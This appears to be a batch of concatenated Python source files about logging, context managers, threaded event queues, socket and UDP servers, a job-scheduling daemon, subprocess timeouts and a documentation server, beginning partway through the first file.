self.info("The exported files can be found in the following location{}:\n • {}".format(
"s" if len(self.export_dirs) > 1 else "", "\n • ".join(sorted(self.export_dirs))))
elif self.log_levelcount:
# Errors or warnings were logged but execution finished anyway. Notify user of potential problems.
problems = []
if self.log_levelcount["ERROR"]:
problems.append("{} error{}".format(self.log_levelcount["ERROR"],
"s" if self.log_levelcount["ERROR"] > 1 else ""))
if self.log_levelcount["WARNING"]:
problems.append("{} warning{}".format(self.log_levelcount["WARNING"],
"s" if self.log_levelcount["WARNING"] > 1 else ""))
self.warning(
"Job execution finished but {} occured. See log messages above or {} for details.".format(
" and ".join(problems), os.path.join(paths.log_dir, self.log_filename)))
if self.show_summary:
if self.messages:
print()
elapsed = round(time.time() - self.start_time)
self.info("Time elapsed: {}".format(timedelta(seconds=elapsed)))
@staticmethod
def cleanup():
"""Remove Snakemake log files."""
snakemake_log_file = logger.get_logfile()
if snakemake_log_file is not None:
log_file = Path(snakemake_log_file)
if log_file.is_file():
try:
log_file.unlink()
except PermissionError:
pass
def setup_logging(log_server, log_level: Optional[str] = "warning", log_file_level: Optional[str] = "warning"):
"""Set up logging with socket handler."""
# Use the lowest log level, but never higher than warning
log_level = min(logging.WARNING, getattr(logging, log_level.upper()), getattr(logging, log_file_level.upper()))
socket_logger = logging.getLogger("sparv")
socket_logger.setLevel(log_level)
socket_handler = logging.handlers.SocketHandler(*log_server)
socket_logger.addHandler(socket_handler)
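
def _example_child_process(log_server_address):
    """Hedged sketch (not part of the original module): a child process would
    call setup_logging() with the (host, port) pair exposed by
    LogHandler.log_server, then log as usual. Records travel through the
    SocketHandler as 4-byte-length-prefixed pickles, which is exactly what
    LogRecordStreamHandler.handle() above unpacks."""
    setup_logging(log_server_address, log_level="info", log_file_level="debug")
    logging.getLogger("sparv.example").info("hello from a worker process")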
|
contextutil.py
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import shutil
import signal
import sys
import tempfile
import threading
import time
import uuid
import zipfile
from contextlib import closing, contextmanager
from queue import Queue
from socketserver import TCPServer
from types import FrameType
from typing import IO, Any, Callable, Iterator, Mapping, Optional, Type, Union, cast
from colors import green
from pants.util.dirutil import safe_delete
from pants.util.tarutil import TarFile
class InvalidZipPath(ValueError):
"""Indicates a bad zip file path."""
@contextmanager
def environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Update the environment to the supplied values, for example:
with environment_as(PYTHONPATH='foo:bar:baz',
PYTHON='/usr/bin/python2.7'):
subprocess.Popen(foo).wait()
"""
new_environment = kwargs
old_environment = {}
def setenv(key: str, val: Optional[str]) -> None:
if val is not None:
os.environ[key] = val
else:
if key in os.environ:
del os.environ[key]
for key, val in new_environment.items():
old_environment[key] = os.environ.get(key)
setenv(key, val)
try:
yield
finally:
for key, val in old_environment.items():
setenv(key, val)
def _purge_env() -> None:
# N.B. Without the use of `del` here (which calls `os.unsetenv` under the hood), subprocess
    # invocations or other things that may access the environment at the C level may not see the
# correct env vars (i.e. we can't just replace os.environ with an empty dict).
# See https://docs.python.org/3/library/os.html#os.unsetenv for more info.
#
# Wraps iterable in list() to make a copy and avoid issues with deleting while iterating.
for k in list(os.environ.keys()):
del os.environ[k]
def _restore_env(env: Mapping[str, str]) -> None:
for k, v in env.items():
os.environ[k] = v
@contextmanager
def hermetic_environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Set the environment to the supplied values from an empty state."""
old_environment = os.environ.copy()
_purge_env()
try:
with environment_as(**kwargs):
yield
finally:
_purge_env()
_restore_env(old_environment)
@contextmanager
def _stdio_stream_as(src_fd: int, dst_fd: int, dst_sys_attribute: str, mode: str) -> Iterator[None]:
"""Replace the given dst_fd and attribute on `sys` with an open handle to the given src_fd."""
if src_fd == -1:
src = open("/dev/null", mode)
src_fd = src.fileno()
# Capture the python and os level file handles.
old_dst = getattr(sys, dst_sys_attribute)
old_dst_fd = os.dup(dst_fd)
if src_fd != dst_fd:
os.dup2(src_fd, dst_fd)
# Open up a new file handle to temporarily replace the python-level io object, then yield.
new_dst = os.fdopen(dst_fd, mode)
setattr(sys, dst_sys_attribute, new_dst)
try:
yield
finally:
new_dst.close()
# Restore the python and os level file handles.
os.dup2(old_dst_fd, dst_fd)
setattr(sys, dst_sys_attribute, old_dst)
@contextmanager
def stdio_as(stdout_fd: int, stderr_fd: int, stdin_fd: int) -> Iterator[None]:
"""Redirect sys.{stdout, stderr, stdin} to alternate file descriptors.
As a special case, if a given destination fd is `-1`, we will replace it with an open file handle
to `/dev/null`.
NB: If the filehandles for sys.{stdout, stderr, stdin} have previously been closed, it's
possible that the OS has repurposed fds `0, 1, 2` to represent other files or sockets. It's
impossible for this method to locate all python objects which refer to those fds, so it's up
to the caller to guarantee that `0, 1, 2` are safe to replace.
The streams expect unicode. To write and read bytes, access their buffer, e.g. `stdin.buffer.read()`.
"""
with _stdio_stream_as(stdin_fd, 0, "stdin", "r"), _stdio_stream_as(
stdout_fd, 1, "stdout", "w"
), _stdio_stream_as(stderr_fd, 2, "stderr", "w"):
yield
@contextmanager
def signal_handler_as(
sig: int, handler: Union[int, Callable[[int, FrameType], None]]
) -> Iterator[None]:
"""Temporarily replaces a signal handler for the given signal and restores the old handler.
:param sig: The target signal to replace the handler for (e.g. signal.SIGINT).
:param handler: The new temporary handler.
"""
old_handler = signal.signal(sig, handler)
try:
yield
finally:
signal.signal(sig, old_handler)
@contextmanager
def temporary_dir(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
prefix: Optional[str] = tempfile.template,
) -> Iterator[str]:
"""A with-context that creates a temporary directory.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary directory.
:param cleanup: Whether or not to clean up the temporary directory.
:param permissions: If provided, sets the directory permissions to this mode.
"""
path = tempfile.mkdtemp(dir=root_dir, suffix=suffix, prefix=prefix)
try:
if permissions is not None:
os.chmod(path, permissions)
yield path
finally:
if cleanup:
shutil.rmtree(path, ignore_errors=True)
@contextmanager
def temporary_file_path(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
) -> Iterator[str]:
"""A with-context that creates a temporary file and returns its path.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
"""
with temporary_file(root_dir, cleanup=cleanup, suffix=suffix, permissions=permissions) as fd:
fd.close()
yield fd.name
@contextmanager
def temporary_file(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
binary_mode: bool = True,
) -> Iterator[IO]:
"""A with-context that creates a temporary file and returns a writeable file descriptor to it.
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
:param suffix: If suffix is specified, the file name will end with that suffix.
Otherwise there will be no suffix.
mkstemp() does not put a dot between the file name and the suffix;
if you need one, put it at the beginning of suffix.
See :py:class:`tempfile.NamedTemporaryFile`.
:param permissions: If provided, sets the file to use these permissions.
:param binary_mode: Whether file opens in binary or text mode.
"""
mode = "w+b" if binary_mode else "w+" # tempfile's default is 'w+b'
with tempfile.NamedTemporaryFile(suffix=suffix, dir=root_dir, delete=False, mode=mode) as fd:
try:
if permissions is not None:
os.chmod(fd.name, permissions)
yield fd
finally:
if cleanup:
safe_delete(fd.name)
@contextmanager
def safe_file(path: str, suffix: Optional[str] = None, cleanup: bool = True) -> Iterator[str]:
"""A with-context that copies a file, and copies the copy back to the original file on success.
This is useful for doing work on a file but only changing its state on success.
:param suffix: Use this suffix to create the copy. Otherwise use a random string.
:param cleanup: Whether or not to clean up the copy.
"""
safe_path = f"{path}.{(suffix or uuid.uuid4())}"
if os.path.exists(path):
shutil.copy(path, safe_path)
try:
yield safe_path
if cleanup:
shutil.move(safe_path, path)
else:
shutil.copy(safe_path, path)
finally:
if cleanup:
safe_delete(safe_path)
@contextmanager
def pushd(directory: str) -> Iterator[str]:
"""A with-context that encapsulates pushd/popd."""
cwd = os.getcwd()
os.chdir(directory)
try:
yield directory
finally:
os.chdir(cwd)
@contextmanager
def open_zip(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[zipfile.ZipFile]:
"""A with-context for zip files.
Passes through *args and **kwargs to zipfile.ZipFile.
:API: public
:param path_or_file: Full path to zip file.
:param args: Any extra args accepted by `zipfile.ZipFile`.
:param kwargs: Any extra keyword args accepted by `zipfile.ZipFile`.
:raises: `InvalidZipPath` if path_or_file is invalid.
:raises: `zipfile.BadZipfile` if zipfile.ZipFile cannot open a zip at path_or_file.
"""
if not path_or_file:
raise InvalidZipPath(f"Invalid zip location: {path_or_file}")
if "allowZip64" not in kwargs:
kwargs["allowZip64"] = True
try:
zf = zipfile.ZipFile(path_or_file, *args, **kwargs)
except zipfile.BadZipfile as bze:
# Use the realpath in order to follow symlinks back to the problem source file.
raise zipfile.BadZipfile(f"Bad Zipfile {os.path.realpath(path_or_file)}: {bze}")
try:
yield zf
finally:
zf.close()
@contextmanager
def open_tar(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[TarFile]:
"""A with-context for tar files. Passes through positional and kwargs to tarfile.open.
If path_or_file is a file, caller must close it separately.
"""
(path, fileobj) = (
(path_or_file, None) if isinstance(path_or_file, str) else (None, path_or_file)
)
kwargs["fileobj"] = fileobj
with closing(TarFile.open(path, *args, **kwargs)) as tar:
# We must cast the normal tarfile.TarFile to our custom pants.util.tarutil.TarFile.
typed_tar = cast(TarFile, tar)
yield typed_tar
class Timer:
"""Very basic with-context to time operations.
Example usage:
>>> from pants.util.contextutil import Timer
>>> with Timer() as timer:
... time.sleep(2)
...
>>> timer.elapsed
2.0020849704742432
"""
def __init__(self, clock=time) -> None:
self._clock = clock
def __enter__(self) -> "Timer":
self.start: float = self._clock.time()
self.finish: Optional[float] = None
return self
@property
def elapsed(self) -> float:
end_time: float = self.finish if self.finish is not None else self._clock.time()
return end_time - self.start
def __exit__(self, typ, val, traceback):
self.finish = self._clock.time()
@contextmanager
def exception_logging(logger: logging.Logger, msg: str) -> Iterator[None]:
"""Provides exception logging via `logger.exception` for a given block of code.
:param logger: The `Logger` instance to use for logging.
:param msg: The message to emit before `logger.exception` emits the traceback.
"""
try:
yield
except Exception:
logger.exception(msg)
raise
@contextmanager
def maybe_profiled(profile_path: Optional[str]) -> Iterator[None]:
"""A profiling context manager.
:param profile_path: The path to write profile information to. If `None`, this will no-op.
"""
if not profile_path:
yield
return
import cProfile
profiler = cProfile.Profile()
try:
profiler.enable()
yield
finally:
profiler.disable()
profiler.dump_stats(profile_path)
view_cmd = green(
"gprof2dot -f pstats {path} | dot -Tpng -o {path}.png && open {path}.png".format(
path=profile_path
)
)
logging.getLogger().info(
f"Dumped profile data to: {profile_path}\nUse e.g. {view_cmd} to render and view."
)
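
def _example_maybe_profiled(profile_path=None):
    """Hedged usage sketch (not part of the original module): because
    maybe_profiled is a no-op when profile_path is None, callers can thread an
    optional --profile flag straight through without branching."""
    with maybe_profiled(profile_path):
        sum(range(100000))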
@contextmanager
def http_server(handler_class: Type) -> Iterator[int]:
def serve(port_queue: "Queue[int]", shutdown_queue: "Queue[bool]") -> None:
httpd = TCPServer(("", 0), handler_class)
httpd.timeout = 0.1
port_queue.put(httpd.server_address[1])
while shutdown_queue.empty():
httpd.handle_request()
port_queue: "Queue[int]" = Queue()
shutdown_queue: "Queue[bool]" = Queue()
t = threading.Thread(target=lambda: serve(port_queue, shutdown_queue))
t.daemon = True
t.start()
try:
yield port_queue.get(block=True)
finally:
shutdown_queue.put(True)
t.join()
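
def _example_http_server():
    """Hedged usage sketch (not part of the original module): serve the
    standard library's SimpleHTTPRequestHandler on an ephemeral port and issue
    a single request against it."""
    from http.server import SimpleHTTPRequestHandler
    from urllib.request import urlopen

    with http_server(SimpleHTTPRequestHandler) as port:
        with urlopen(f"http://127.0.0.1:{port}/") as response:
            print(response.status)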
|
handler.py
|
import logging
import time
from abc import ABCMeta
from collections import defaultdict
from queue import Queue
from threading import Lock, Thread
from __main__ import config
from ..types import ActiveHunter, Hunter
from ...core.events.types import HuntFinished
import threading
queue_lock = Lock()
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.hooks = defaultdict(list)
self.running = True
self.workers = list()
for i in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
else:
self.active_hunters[hook] = hook.__doc__
elif Hunter in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logging.debug('{} subscribed to {}'.format(hook, event))
# getting instantiated event object
def publish_event(self, event, caller=None):
logging.debug('Event {} got published with {}'.format(event.__class__, event))
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if caller:
event.previous = caller.event
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
queue_lock.acquire()
hook = self.get()
queue_lock.release()
try:
hook.execute()
except Exception as ex:
logging.debug(ex)
self.task_done()
logging.debug("closing thread...")
def notifier(self):
time.sleep(2)
while self.unfinished_tasks > 0:
logging.debug("{} tasks left".format(self.unfinished_tasks))
time.sleep(3)
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
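
def _example_subscription():
    """Hedged sketch (not part of the original module): register a passive
    hunter for HuntFinished using the decorator form of handler.subscribe.
    ExampleHunter is an illustrative class, not a real kube-hunter hunter."""
    @handler.subscribe(HuntFinished)
    class ExampleHunter(Hunter):
        """Example passive hunter (illustrative only)."""
        def __init__(self, event):
            self.event = event

        def execute(self):
            logging.debug("hunt finished event observed")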
|
listener.py
|
import SocketServer
import threading
import socket
import re
from PIL import Image
import kirk
import ImageTk
import Tkinter
from showTk import showTk
File = kirk.File
width = kirk.width
height = kirk.height
box_size = kirk.box_size
window = []
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = re.split(', ',self.request[0])
socket = self.request[1]
name = data[0]
x = int(data[1])
y = int(data[2])
sem.acquire()
if name in people:
            people[name] = (x, y)
else:
people.update({name:(x, y)})
print people
sem.release()
im = Image.open(File).copy()
im.paste("red", (x*box_size, y*box_size, x*box_size+box_size, y*box_size+box_size))
window.update(im = im)
if __name__ == "__main__":
sem = threading.Semaphore()
window = showTk(im = File)
people = dict([])
HOST, PORT = "<broadcast>", 8000
server = ThreadedUDPServer((HOST, PORT), MyUDPHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
    window.mainloop()
    # mainloop() blocks until the window is closed; shut the UDP server down
    # afterwards instead of spinning in a busy-wait loop
    server.shutdown()
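# Hedged usage sketch (not part of the original script, Python 2 syntax): a
# client reports its position with one broadcast datagram in the
# "name, x, y" format that MyUDPHandler.handle() splits on ", ".
#
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
#   s.sendto("alice, 3, 4", ("<broadcast>", 8000))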
|
server.py
|
import os
import logging
import socket
import time
import pickle
import psutil
from argparse import ArgumentParser
from threading import Thread, Lock
from nesta.server.define import define
from nesta.server import schedule
from nesta.external.daemon import Daemon
from nesta.tasks.tasks import get_worker
from nesta.tasks.notice import get_notice
from nesta.utils.rabbitmq import RabbitMQClient
from nesta.utils.mysql import MySQLClient
from nesta.utils.log import init_logger
from nesta.configs.util import parse_env, parse_config
def parse_arguments():
parser = ArgumentParser("Nesta server")
parser.add_argument("--daemonize", "-d", dest="daemonize",
type=bool, default=True, help="daemonize or not")
return parser.parse_args()
class Server(Daemon):
def __init__(self, configs):
assert isinstance(configs, dict)
        self._configs = configs
        self._config_common = configs["services"]["common"]
        self._config_server = configs["services"]["server"]
        logfile = self._configs["services"]["server"]["logfile"]
        super().__init__(
            pidfile=self._configs["services"]["server"]["pidfile"],
            stdout=logfile,
            stderr=logfile
        )
self._logger = init_logger(
name="server",
logfile=logfile,
loglevel=configs["services"]["server"]["loglevel"]
)
self._worker = get_worker(**configs)
self._notice = get_notice(**configs)
self._interval = self._config_server["interval"]
self._status = define.STATUS_RUNNING if self._config_server[
"auto_start"] else define.STATUS_STOPPED
self._mutex = Lock()
def _run(self):
self._logger.info("Server has been started")
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "Server has been started"
})
threads = [Thread(target=self._wrap, args=[func])
for func in [self._communicate, self._update_result]]
for t in threads:
t.start()
self._main()
"""
try:
self._wrap(self._main)
except Exception as e:
print (e)
"""
for t in threads:
t.join()
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Server has been terminated"
})
self._logger.info("Server has been terminated")
def _set_status(self, status):
with self._mutex:
self._status = status
def _wrap(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self._status = define.STATUS_TERMINATED
self._logger.critical(f"Unexpected error, start to terminate :{e}")
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg" : "Unexpected error, start to terminate: {}".format(e)
})
def _communicate(self):
"""
thread for communicating with external clients(control)
"""
self._logger.debug("communicate thread has been started")
# prepare for server_socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(
(self._config_server["host"], self._config_server["port"]))
server_socket.listen()
server_socket.settimeout(0.5)
while True:
if self._status == define.STATUS_TERMINATED:
self._logger.debug("communicate thread has been terminated")
break
try:
client_socket, _ = server_socket.accept()
msg = client_socket.recv(1024).decode()
self._logger.info("Recieve msg from client: {}".format(msg))
if msg == "hi":
client_socket.sendall("hello".encode())
elif msg == "status":
client_socket.sendall(self._status.encode())
elif msg == "summary":
self._logger.info("Send summary")
cpu_count = psutil.cpu_count()
data = "status: {}, cpu: {}(%), memory: {}(%), loadavg: {}(%)".format(
self._status,
psutil.cpu_percent(),
psutil.virtual_memory().percent,
"/".join(["{:.0f}".format(x/cpu_count*100) for x in psutil.getloadavg()])
)
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": data
})
client_socket.sendall(data.encode())
else:
self._logger.warn(f"Unknown msg: {msg}")
client_socket.close()
except socket.timeout:
pass
except Exception as e:
self._logger.error(f"Unexpected error: {e}")
server_socket.close()
def _main(self):
"""
main thread for handling message queues and assigning jobs
"""
self._logger.debug("main thread has been started")
conn = MySQLClient()
conn.init(**self._config_common["mysql"])
mq_client = RabbitMQClient()
mq_client.init(**self._config_common["rabbitmq"])
queue = self._config_common["rabbitmq"]["queue"]
# purge and declare before starting
try:
pass
#mq_client.queue_purge(queue)
except:
pass
mq_client.queue_declare(queue)
is_first = True
while True:
if self._status == define.STATUS_TERMINATED:
self._logger.debug("main thread has been terminated")
break
            # time interval from second loop
if is_first is True:
is_first = False
else:
time.sleep(self._interval)
data = mq_client.get(queue)
if data:
self._logger.info("Recieve queue: {}".format(data))
try:
self._handle_queue(conn, data)
except Exception as e:
self._logger.error(f"Error while _handle_queue: {e}")
continue
if self._status == define.STATUS_STOPPED:
self._logger.info("Server has been stopped")
continue
# assign jobs
self._assign_jobs(conn)
def _handle_queue(self, conn, data):
title = data["title"]
body = data["body"]
self._logger.debug(
"handle_queue > title: {}, body: {}".format(title, body))
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "handle_queue > title: {}, body: {}".format(title, body)}
)
if title == "server":
cmd = body.get("command", None)
by = body.get("by", "undefined")
if cmd == "terminate":
self._logger.info(f"Server is terminated by {by}")
self._set_status(define.STATUS_TERMINATED)
elif cmd == "stop":
self._set_status(define.STATUS_STOPPED)
self._logger.info(f"Server is stopped by {by}")
elif cmd == "resume":
self._set_status(define.STATUS_RUNNING)
self._logger.info(f"Server is resumed by {by}")
else:
self._logger.info(f"Undefined {title} command {by}: {cmd}")
elif title == "schedule":
cmd = body.get("command", None)
if cmd == "insert":
date = body["date"]
assert isinstance(date, str)
try:
schedule.dump_schedule_hist(conn)
schedule.generate_schedule(conn, date)
conn.commit()
except Exception as e:
conn.rollback()
self._logger.error(
"Error while generating schedule: {}".format(e))
else:
self._logger.warn(f"Undefined {title} command: {cmd}")
else:
raise ValueError(f"Undefined title: {title}")
def _assign_jobs(self, conn):
# commit for getting up-to-date db status
conn.commit()
# assign jobs
jobs = schedule.get_assignable_jobs(conn)
if not len(jobs):
self._logger.debug("There is no assignable jobs")
return
try:
for row in jobs:
self._logger.info(f"Assign job: {row[1]}")
task_id = self._worker.send_task("script", [row[1]])
conn.execute(
f"""
UPDATE job_schedule
SET job_status=1, task_id='{task_id}', run_count=run_count+1, assign_time=now()
WHERE jid={row[0]};
"""
)
conn.commit()
except Exception as e:
self._logger.error(e)
conn.rollback()
self._notice.send_task(
"notice",
kwargs={
"level": "ERROR",
"msg": "Error while assign_jobs: {}".format(e)
})
def _update_result(self):
"""
thread for updating result
"""
self._logger.debug("update_result thread has been started")
conn = MySQLClient()
conn.init(**self._config_common["mysql"])
is_first = True
while True:
# time interval from second loop
if is_first is True:
is_first = False
else:
time.sleep(self._interval)
if self._status == define.STATUS_TERMINATED:
self._logger.debug("update_result thread has been terminated")
break
elif self._status == define.STATUS_STOPPED:
self._logger.debug("update_result thread has been stopped")
continue
# commit for getting up-to-date db status
conn.commit()
# get finished jobs
data = conn.fetchall(
"""
SELECT jid, task_id, job_status from job_schedule where task_id IS NOT NULL;
"""
)
if not len(data):
self._logger.debug("No data to update result")
continue
# update job_status and task_id=NULL
sql_list = list()
for row in data:
job_id = row[0]
task_id = row[1]
job_status = row[2]
result = self._worker.AsyncResult(task_id)
state = result.state
self._logger.info("Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status))
if result.ready():
if state == "REVOKED":
sql_list.append("""
update job_schedule set job_status=-9, task_id=NULL where jid={};
""".format(job_id)
)
elif state in ["STARTED", "SUCCESS"]:
result_code = result.get()
if result_code == 0:
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "Job finished: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
job_status = 99
else:
self._notice.send_task(
"notice",
kwargs={
"level": "ERROR",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
job_status = -result_code
sql_list.append("""
update job_schedule set job_status={}, task_id=NULL where jid={};
""".format(job_status, job_id)
)
elif state == "FAILURE":
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
sql_list.append("""
                        update job_schedule set job_status=-999, task_id=NULL where jid={};
""".format(job_id)
)
else:
self._logger.error(
"Unexpected ready status: {}".format(state))
elif state == "STARTED":
if job_status == 1:
sql_list.append("""
update job_schedule set job_status=2 where jid={};
""".format(job_id)
)
elif state == "PENDING":
continue
elif state == "FAILURE":
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
sql_list.append("""
                        update job_schedule set job_status=-999, task_id=NULL where jid={};
""".format(job_id)
)
else:
self._logger.error("Unexpected status: {}".format(state))
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
            # nothing to do unless there are queued SQL updates
if len(sql_list):
self._logger.info("sql_list: {}".format(sql_list))
try:
for sql in sql_list:
conn.execute(sql)
conn.commit()
except Exception as e:
self._logger.error(e)
conn.rollback()
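
def _example_control_client(host="127.0.0.1", port=9999):
    """Hedged sketch (not part of the original module): a minimal control
    client speaking the plain-text protocol handled by _communicate(). The
    host and port are illustrative; use the values from the server config."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.sendall(b"status")
    print(client.recv(1024).decode())
    client.close()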
if __name__ == "__main__":
env_dict = parse_env()
configs = parse_config(env_dict["MODE"])
configs["env"] = env_dict
option = parse_arguments()
server = Server(configs=configs)
server.start()
|
conc.py
|
""" Helpers for concurrency and threading stuff. """
import threading
def simple_thread(func, daemon=True):
""" Start function in another thread, discarding return value. """
thread = threading.Thread(target=func)
thread.daemon = daemon
thread.start()
return thread
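
if __name__ == "__main__":
    # Minimal usage sketch (not part of the original helper): run a function
    # in a background daemon thread and wait for it to finish.
    worker = simple_thread(lambda: print("running in the background"))
    worker.join()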
|
command.py
|
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import signal
import subprocess
import sys
import threading
import time
import os
class Command:
def __init__(self, cmd, path=None):
self.cmd = cmd
self.process = None
self.exec_time = -1
self.output = [] # store output here
self.kwargs = {}
self.timeout = False
self.path = path
# set system/version dependent "start_new_session" analogs
if sys.platform == "win32":
self.kwargs.update(creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
self.kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
self.kwargs.update(start_new_session=True)
def kill_process_tree(self, pid):
try:
if sys.platform != "win32":
os.killpg(pid, signal.SIGKILL)
else:
subprocess.call(['taskkill', '/F', '/T', '/PID', str(pid)])
except OSError as err:
print(err)
def run(self, timeout=3600, assert_returncode_zero=True):
def target():
start_time = time.time()
with subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
bufsize=1, cwd=self.path, **self.kwargs) as p:
self.process = p
self.timeout = False
self.output = []
for line in self.process.stdout:
line = line.decode('utf-8')
self.output.append(line)
sys.stdout.write(line)
sys.stdout.flush()
self.process.stdout.close()
self.process.wait()
self.exec_time = time.time() - start_time
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
print("Error: process taking too long to complete--terminating" + ", [ " + self.cmd + " ]")
self.kill_process_tree(self.process.pid)
self.exec_time = timeout
self.timeout = True
thread.join()
except OSError as e:
                print(self.process.pid, "Exception when trying to kill task by PID, " + e.strerror)
raise
returncode = self.process.wait()
print("Process returncode = " + str(returncode))
if assert_returncode_zero:
assert returncode == 0, "Process exited with a non-zero exit code {}; output:{}".format(
returncode,
"".join(self.output))
return returncode
def get_execution_time(self):
return self.exec_time
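
if __name__ == "__main__":
    # Hedged usage sketch (not part of the original class): run a short shell
    # command with a timeout and inspect the captured output. "echo hello" is
    # an illustrative command, not something the module itself runs.
    cmd = Command("echo hello")
    cmd.run(timeout=10)
    print("exec time: {:.3f}s".format(cmd.get_execution_time()))
    print("".join(cmd.output))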
|
conftest.py
|
import pytest
import server
from multiprocessing import Process
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = server.create_server()
    process = Process(target=instance.serve_forever)
process.daemon = True
process.start()
|
docserver.py
|
from __future__ import print_function
import flask
import os
import sys
import threading
import time
import webbrowser
import tornado
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
@app.route('/scripts/<path:filename>')
def send_script(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/scripts/"), filename)
def open_browser():
# Child process
time.sleep(0.5)
    webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new=2)  # new=2 opens in a new tab
data = {}
def serve_http():
data['ioloop'] = IOLoop()
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
ioloop = data['ioloop']
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
try:
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
except:
pass
if __name__ == "__main__":
if tornado.version_info[0] == 4:
print('docserver.py script requires tornado 5 or higher')
sys.exit(1)
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import threading
import unittest
import socketserver
import test.support
from test.support import reap_children, verbose
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = socket_helper.HOST
